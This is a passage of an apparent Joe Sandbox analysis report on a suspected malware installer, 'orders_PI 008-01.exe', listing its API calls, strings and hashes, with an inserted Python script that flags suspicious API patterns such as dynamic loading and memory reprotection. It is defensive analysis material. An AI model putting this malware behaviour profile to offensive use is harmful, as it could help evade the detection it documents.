                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                        • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                        • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                        • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                        • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                        • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                        • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 6FF42BB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: a59346ab49a4f15fa888c8accfbc241af7790ab786aff5c59b2ed716108b9335
                                        • Instruction ID: 0c9c51ff095f2eae9d903316ae20a78af270fe12cd9645dd238a8bd388f81a01
                                        • Opcode Fuzzy Hash: a59346ab49a4f15fa888c8accfbc241af7790ab786aff5c59b2ed716108b9335
                                        • Instruction Fuzzy Hash: 6B419F76410705DFDB20FFACD980B593F74EF56328F248975E904CA362C736A4998BA1
                                        APIs
                                        • GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 8ac853b157e3d29670509e7d4e3fc1534842e7f7c305d97ca4392d4f83452dbf
                                        • Instruction ID: f0f88bb333c776bfc90923b7f242aa05c9139358075ed49ec17bce39e1d44b19
                                        • Opcode Fuzzy Hash: 8ac853b157e3d29670509e7d4e3fc1534842e7f7c305d97ca4392d4f83452dbf
                                        • Instruction Fuzzy Hash: 90B01274A10400DFEE00BF6CCC06F343654F711311F084000FA00D0392C1244C388534
                                        APIs
                                          • Part of subcall function 6FF4121B: GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        • GlobalAlloc.KERNEL32(?,00001CA4), ref: 6FF41C8D
                                        • lstrcpyW.KERNEL32(00000008,?), ref: 6FF41CD5
                                        • lstrcpyW.KERNEL32(00000808,?), ref: 6FF41CDF
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41CF2
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DD4
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DD9
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DDE
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41FC8
                                        • lstrcpyW.KERNEL32(?,?), ref: 6FF42182
                                        • GetModuleHandleW.KERNEL32(00000008), ref: 6FF42201
                                        • LoadLibraryW.KERNEL32(00000008), ref: 6FF42212
                                        • GetProcAddress.KERNEL32(?,?), ref: 6FF4226C
                                        • lstrlenW.KERNEL32(00000808), ref: 6FF42286
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 1ca32c0700a8fe796ff8d94884ca3f8388ea40a41fb94557a89bdfcf7bc90378
                                        • Instruction ID: 175d2874a101af50c9576d0a2b110d68688f2f2ca8ccdba379914442fa3ddb67
                                        • Opcode Fuzzy Hash: 1ca32c0700a8fe796ff8d94884ca3f8388ea40a41fb94557a89bdfcf7bc90378
                                        • Instruction Fuzzy Hash: 56229D72D14606DADB12CFB8C9806EEBFB0FF09315F10462ED165E7292E77466A1CB50
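The function records above list raw API references only; reading them by hand for the interesting combinations (the GetModuleHandleW / LoadLibraryW / GetProcAddress chain in the record just above, VirtualAlloc and VirtualProtect in the 6FF40000 module, RegOpenKeyExW in the main image) is tedious across a few hundred records. The following Python script is an added triage aid written for this page, not code from Joe Sandbox or from the sample: it parses "APIs" entries in exactly the textual shape the report uses (including "Part of subcall function" lines and calls listed without an argument list, such as wsprintfA), groups them per function record, and matches a few rules over the API names. The sample text is constructed from lines copied off this page; the rule names, the rule table and the choice to match on API name regardless of whether the report resolved the call to KERNEL32 or KERNELBASE are the author's assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: "APIs" entries copied from the function records on this page,
# plus one record with a no-argument entry (wsprintfA) to exercise that line shape.
SAMPLE_REPORT = """\
APIs
• VirtualProtect.KERNELBASE(6FF4505C,?,?,6FF4504C), ref: 6FF429FD
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 6FF42BB7
APIs
  • Part of subcall function 6FF4121B: GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
• GlobalAlloc.KERNEL32(?,00001CA4), ref: 6FF41C8D
• GetModuleHandleW.KERNEL32(00000008), ref: 6FF42201
• LoadLibraryW.KERNEL32(00000008), ref: 6FF42212
• GetProcAddress.KERNEL32(?,?), ref: 6FF4226C
• lstrlenW.KERNEL32(00000808), ref: 6FF42286
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
APIs
• wsprintfA.USER32 ref: 004060B9
"""

# One "APIs" entry:  • [Part of subcall function ADDR: ]Api.Module[(args)], ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Rule table (assumed, not Joe Sandbox's): name -> (APIs that must all appear, APIs of which at least one must appear)
RULES = {
    "dynamic api resolution": ({"GetProcAddress"},
                               {"LoadLibraryW", "LoadLibraryA", "GetModuleHandleW", "GetModuleHandleA"}),
    "allocates or reprotects memory": (set(), {"VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "VirtualProtectEx"}),
    "registry access": (set(), {"RegOpenKeyExW", "RegOpenKeyExA", "RegQueryValueExW", "RegQueryValueExA"}),
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str          # KERNEL32 or KERNELBASE as the report resolved it; kernel32 forwards many exports to kernelbase
    args: tuple
    ref: int             # address of the call site
    subcall_of: Optional[int]   # callee address when the entry is "Part of subcall function", else None


def parse_records(text: str) -> list[list[ApiCall]]:
    """Split the report on 'APIs' headers and return one list of ApiCall per function record."""
    records: list[list[ApiCall]] = []
    current: Optional[list[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue   # not an API entry (memory dump source, hashes, ...)
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        current.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                               int(m["sub"], 16) if m["sub"] else None))
    return records


def match_rules(record: list[ApiCall], include_subcalls: bool = True) -> list[str]:
    """Names of the rules a single function record satisfies, in RULES order."""
    names = {c.api for c in record if include_subcalls or c.subcall_of is None}
    return [name for name, (need_all, need_any) in RULES.items()
            if need_all <= names and (not need_any or names & need_any)]


def triage(text: str) -> dict[int, tuple[str, list[str]]]:
    """Map record index -> (address of the record's first own call site, rule hits) for records with at least one hit."""
    out = {}
    for i, rec in enumerate(parse_records(text)):
        hits = match_rules(rec)
        if rec and hits:
            anchor = next((c.ref for c in rec if c.subcall_of is None), rec[0].ref)
            out[i] = (f"{anchor:08X}", hits)
    return out


if __name__ == "__main__":
    for idx, (addr, hits) in triage(SAMPLE_REPORT).items():
        print(f"record {idx} @ {addr}: {', '.join(hits)}")
```

To use it on a full report, paste the export into a file and call triage on its contents; the "Memory Dump Source" and hash lines are ignored by the parser, so the whole page can be fed in unchanged. Matching on the API name alone is deliberate: the same export shows up as KERNEL32 or KERNELBASE depending on where Joe Sandbox resolved the call, and a rule keyed on the module would miss half the hits.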
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061D5,00000000,00000000), ref: 00406075
                                        • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                          • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                          • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                        • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                        • wsprintfA.USER32 ref: 004060B9
                                        • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,?,007A5DE8,?), ref: 004060F4
                                        • GlobalAlloc.KERNEL32(?,0000000A), ref: 00406103
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040613B
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                        • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                        • CloseHandle.KERNEL32(00000000), ref: 004061A9
                                          • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                          • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]$Uz$]z
                                        • API String ID: 2171350718-2939442745
                                        • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                        • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                        • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                        • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406700
                                        • CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040670F
                                        • CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406714
                                        • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406727
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                        • *?|<>/":, xrefs: 004066EF
                                        • "C:\Users\user\Desktop\orders_PI 008-01.exe", xrefs: 0040669D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-1771627364
                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                        • GetSysColor.USER32(00000000), ref: 00404406
                                        • SetTextColor.GDI32(?,00000000), ref: 00404412
                                        • SetBkMode.GDI32(?,?), ref: 0040441E
                                        • GetSysColor.USER32(?), ref: 00404431
                                        • SetBkColor.GDI32(?,?), ref: 00404441
                                        • DeleteObject.GDI32(?), ref: 0040445B
                                        • CreateBrushIndirect.GDI32(?), ref: 00404465
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                        • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                        APIs
                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402F49
                                        • MulDiv.KERNEL32(000DCD99,00000064,000DD698), ref: 00402F74
                                        • wsprintfW.USER32 ref: 00402F84
                                        • SetWindowTextW.USER32(?,?), ref: 00402F94
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402F7E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                        • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                        • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                        • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                        APIs
                                          • Part of subcall function 6FF4121B: GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        • GlobalFree.KERNEL32(?), ref: 6FF426A3
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF426D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                         • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: a822d23b48568b3f3d66e4274004f5704ca3c9affc177be5894c4b39557a051d
                                        • Instruction ID: c97ff57f952e20d08e91d4493e7bd553e4edb81a0b2f3b854f4318e655be36f7
                                        • Opcode Fuzzy Hash: a822d23b48568b3f3d66e4274004f5704ca3c9affc177be5894c4b39557a051d
                                        • Instruction Fuzzy Hash: A131CD32214502EFCB15AF68C984E2A7FBAFF973143144239F500D7262C732A829CB65
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                         • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        • Opcode ID: 667733a3493d08b3a524972902016801cf0064947eaeaddc8d774d0ea7ddf361
                                        • Instruction ID: d05cd5d60aae199ae33422b8e5d82d6580dce23c7bb00569883738afd0321fdb
                                        • Opcode Fuzzy Hash: 667733a3493d08b3a524972902016801cf0064947eaeaddc8d774d0ea7ddf361
                                        • Instruction Fuzzy Hash: 8851C332D041599ACB239FB886806AEBFB5EF45358B0042DBD514E7243D771BEB187B1
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF42522
                                          • Part of subcall function 6FF4122C: lstrcpynW.KERNEL32(00000000,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF4123C
                                        • GlobalAlloc.KERNEL32(?), ref: 6FF424A8
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF424C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                         • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 4216380887-0
                                        • Opcode ID: 2e83babe5917969118adda0704c1ea43f052018a933472fc3fbd12e7dd0a596e
                                        • Instruction ID: f3d3a3489d5bbfa72743f45ad37e51a4ac87fbf1dc7f8c628e435133fd9516cb
                                        • Opcode Fuzzy Hash: 2e83babe5917969118adda0704c1ea43f052018a933472fc3fbd12e7dd0a596e
                                        • Instruction Fuzzy Hash: BA41CEB1108305DFD714EF789880A667BB8FF5A310B00492DE865C72A3DB36A554CB61
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF41635
